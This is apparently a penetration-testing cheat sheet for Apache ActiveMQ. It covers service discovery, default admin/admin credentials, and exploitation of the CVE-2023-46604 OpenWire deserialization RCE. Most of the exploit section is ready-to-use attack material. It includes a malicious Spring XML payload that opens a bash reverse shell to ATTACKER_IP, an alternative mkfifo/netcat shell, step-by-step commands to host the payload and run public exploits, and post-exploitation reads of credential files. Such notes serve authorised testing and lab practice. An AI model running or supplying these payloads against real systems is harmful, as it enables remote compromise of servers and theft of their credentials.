Skip to content

Latest commit

 

History

History
133 lines (96 loc) · 2.74 KB

File metadata and controls

133 lines (96 loc) · 2.74 KB

Apache ActiveMQ

Message broker software - often runs with elevated privileges.


Discovery

Default Ports:

Port Service
8161 Web Console (HTTP/Jetty)
61616 OpenWire transport
61613 STOMP
61614 HTTP/WebSocket
5672 AMQP
1883 MQTT
# Nmap detection
nmap -sC -sV -p 8161,61616,61613,61614,5672,1883 $ip

# Look for
ActiveMQ OpenWire transport
basic realm=ActiveMQRealm
Jetty(9.4.x)

Default Credentials

Username Password
admin admin
(blank) (blank)

Web console: http://TARGET:8161/admin/


CVE-2023-46604 - RCE (OpenWire Deserialization)

Affected: Apache ActiveMQ < 5.15.16, < 5.16.7, < 5.17.6, < 5.18.3

Port: 61616 (OpenWire transport)

Exploit Repositories

# Go version (recommended)
git clone https://github.com/rootsecdev/CVE-2023-46604.git

# Python version
git clone https://github.com/evkl1d/CVE-2023-46604.git

Malicious XML Payload

Create poc-linux.xml:

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans
   http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
        <list>
            <value>bash</value>
            <value>-c</value>
            <value>bash -i &gt;&amp; /dev/tcp/ATTACKER_IP/9001 0&gt;&amp;1</value>
        </list>
        </constructor-arg>
    </bean>
</beans>

Alternative payload (mkfifo):

<value>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc ATTACKER_IP 9001 &gt;/tmp/f</value>

Exploitation Steps

# 1. Host the XML payload
python3 -m http.server 8000

# 2. Start listener
nc -nlvp 9001

# 3. Run exploit (Go version)
./ActiveMQ-RCE -i TARGET_IP -p 61616 -u http://ATTACKER_IP:8000/poc-linux.xml

# Python version
python3 exploit.py -i TARGET_IP -p 61616 -u http://ATTACKER_IP:8000/poc-linux.xml

Verify Vulnerability

# If web server gets hit but no shell, check XML payload encoding
# Make sure &gt; for > and &amp; for &

Post-Exploitation

ActiveMQ often runs as dedicated user:

# Check user
id
# uid=1000(activemq) gid=1000(activemq)

# Config files
ls -la /opt/apache-activemq-*/conf/
cat /opt/apache-activemq-*/conf/activemq.xml
cat /opt/apache-activemq-*/conf/jetty-realm.properties
cat /opt/apache-activemq-*/conf/credentials.properties

References